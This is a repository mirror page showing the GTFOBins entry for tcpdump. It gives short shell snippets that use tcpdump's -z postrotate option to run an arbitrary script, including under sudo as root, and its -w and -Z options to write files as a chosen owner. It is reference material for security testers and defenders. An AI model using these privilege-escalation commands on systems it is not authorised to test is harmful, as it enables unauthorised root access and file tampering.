public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-01-13 07:19:08 +01:00
Code Issues Projects Releases Wiki Activity
3c131d0d7d
GTFOBins.github.io/_gtfobins/tcpdump.md
Blayne Dreier 3c131d0d7d Added file-write using tcpdump
2024-01-12 08:13:06 +13:00

973 B
Raw Blame History

description functions
These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
file-write command sudo
description code
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system. LFILE=file_to_write USER=output_file_owner tcpdump -ln -i lo -w $LFILE -c 1 -Z $USER
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root